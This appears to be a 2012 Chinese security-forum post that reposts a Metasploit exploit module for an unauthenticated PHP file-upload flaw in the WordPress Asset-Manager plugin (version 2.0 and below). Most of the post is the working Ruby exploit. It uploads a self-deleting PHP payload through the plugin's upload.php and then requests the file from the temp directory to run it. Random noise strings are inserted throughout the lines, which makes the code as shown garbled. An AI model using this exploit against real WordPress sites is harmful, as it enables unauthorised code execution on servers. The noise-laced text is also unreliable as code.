找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2387|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
+ t* d' C! q6 k: M' z! q' [- \
7 x4 R- p' {& B##0 Y* x# z: `0 I7 L# t
# This file is part of the Metasploit Framework and may be subject to
& b" t' C6 K: u# redistribution and commercial restrictions. Please see the Metasploit
8 L3 t1 }3 a6 G6 r* ?# Framework web site for more information on licensing and terms of use.. |1 M( `% Q6 K" i! P: ~7 I  O
#   http://metasploit.com/framework/# z8 k) k7 ~$ }9 u9 k& M4 m) h
##
$ v" W6 D' j) U0 o " r5 }4 W9 H7 d$ a
require 'msf/core'
) [) I% c+ M2 m9 l, b. p8 wrequire 'msf/core/exploit/php_exe'
6 u; _/ f- _* G8 y 0 X, U: T5 R5 K& ?
class Metasploit3 < Msf::Exploit::Remote9 ]' w9 s" I! j) ^
  Rank = ExcellentRanking
  @  U  R, c" p ; f' x- @/ I3 E* y7 |
  include Msf::Exploit::Remote::HttpClient
: j1 }* f/ f. P+ j  include Msf::Exploit:hpEXE
4 t% l- ], A. c' g( n* A5 {4 @& r 8 P3 ^! [: o6 U$ P! n# w
  def initialize(info = {})0 H) u9 k# }" e( a* t
    super(update_info(info,
# H4 Y& y8 g2 q: g. I9 z% K4 J      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',2 q8 p+ x2 [0 F+ s+ l( n4 I7 t
      'Description'    => %q{  `  G) n' |4 [0 F. P+ P
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
; l4 U# z$ y. I: j+ D8 G        plugin.  By abusing the upload.php file, a malicious user can upload a file to a# q5 h6 c+ G; J4 q+ S5 P) y3 R
        temp directory without authentication, which results in arbitrary code execution.
. K$ A/ L5 i% D, K      },
4 u# D) |3 T- A" h      'Author'         =>6 H) }: W3 l+ R: R; ]+ K8 F
        [/ o3 ~- w/ g% ^% ?% J; J
          'Sammy FORGIT', # initial discovery- ^  B7 J9 D# F# p
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module# R/ k- J0 \6 n" p  J
        ],
' w5 l' y) E. r$ ^$ T. k      'License'        => MSF_LICENSE,
. j3 I) n3 s6 I0 C. }      'References'     =>
0 D& l1 S) r! E* {1 X5 v7 j        [2 {9 u+ O2 O9 m
          [ 'OSVDB', '82653' ],
( y/ S! ]7 L. I* `5 R7 Q" a          [ 'BID', '53809' ],# ]. B  N' }# @  s- y
          [ 'EDB', '18993' ],1 X: _# I3 ^5 ~0 ^+ M' h# d) j
          [ 'URL', 'http:// www.myhack58.com /' ]+ m: J& M6 _/ E4 ~- a. S; }: K
        ],0 P/ Q6 n* a! a9 g7 [' n* Q
      'Payload'       =>
: A7 i+ t& q$ v; u        {
& C; e% h2 H5 ]9 s# T/ K' J. B2 V          'BadChars' => "\x00",
% n) e( e2 t$ a; h        },, l4 I! i9 `9 V+ A7 I( f
      'Platform'       => 'php',
9 X  C3 z% o0 ?8 _" [      'Arch'           => ARCH_PHP,, w' L3 I2 }( k  w" j; y+ \, T) h
      'Targets'        =>
9 S! N8 g7 J: d# o9 a        [
- W% b5 s( m$ V5 _' G* E: I, `          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],# R% r8 n. s' F! o+ c, g
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
5 {. {' n# o4 J/ V1 p  E        ],
6 V& a5 s1 _* y& R      'DefaultTarget' => 0,- P0 Y( R3 i8 Z1 a7 R5 R: l" w# }" I
      'DisclosureDate' => 'May 26 2012'))
& ]" u8 b# D9 w5 a
& W# V. p  e: W+ K: w7 ^    register_options(" v8 r/ u* ^) j5 Y& N) A
      [% B- |" C7 F, V: A
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
9 `: `7 \; p1 f5 @2 @1 b6 o      ], self.class)
0 ?/ J+ x6 X9 N* \% Q& d  end
. I$ n; A2 T' ~% X7 r
% f1 `3 b3 o' ^5 L% ^) b6 a2 w  def exploit5 H) v& }+ |! Y0 O
    uri =  target_uri.path
/ ]! t& \, R) j" Y3 O% ^; c( x    uri << '/' if uri[-1,1] != '/'
( g8 L6 f, o# W, G9 Q% W- R    peer = "#{rhost}:#{rport}") g5 ]: b! ~, R
    payload_name = "#{rand_text_alpha(5)}.php", J3 o3 h. h1 k. G0 f9 _7 B
    php_payload = get_write_exec_payload(:unlink_self=>true); M% {! b6 k2 i# i9 E0 c

: s5 V& [) |  S) Z) L' D2 r    data = Rex::MIME::Message.new
$ g7 X& Z1 j* F8 d0 k% {    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")' y$ l3 g5 {! }3 n( N0 j; h
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
, {/ h3 w8 Z* l- o8 `9 t 9 F: P9 x" m; ~; o. |- f
    print_status("#{peer} - Uploading payload #{payload_name}")/ K/ a% Z- {& f' B+ O( g
    res = send_request_cgi({" f6 M5 E5 E# x4 k" T* J4 D
      'method'  => 'POST',
, d( a+ i- v2 N6 G* d( X" ?      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
$ R4 \9 m9 y+ @: x      'ctype'   => "multipart/form-data; boundary=#{data.bound}",; s9 H$ ?: Q8 v$ g
      'data'    => post_data2 q2 |/ p7 K5 L/ i1 d
    })
2 f, W- g" W0 x0 k. |9 p5 R+ I, F  } / e4 g) y; u9 ]* Y9 T
    if not res or res.code != 200 or res.body !~ /#{payload_name}/) u8 p" C+ k" G2 N6 g
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
% z8 I7 n8 R" [+ p0 \end6 ?  G/ B+ G- e/ @: h

  ^# k7 e! n5 l    print_status("#{peer} - Executing payload #{payload_name}")
! J1 n7 A' ?1 g4 c+ j0 M8 x    res = send_request_raw({
; t- @" H: P( J      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",! B/ H, n5 s9 J" h
      'method'  => 'GET'
$ h! Y& j6 V; o2 |# D' v8 @$ `    })
5 k- p0 D! m7 }  n+ s: g# `! ^
! E6 D; `# J3 @; M* d( c7 E    if res and res.code != 200( x% |5 K# q) M1 \3 m9 G1 k& g
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
7 l+ M' ?0 M3 `/ H    end5 w# Y* z2 U3 C& Z) M
  end' z0 D1 V' ~4 |" Q: S
end$ g% Y7 a) G% \( u
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表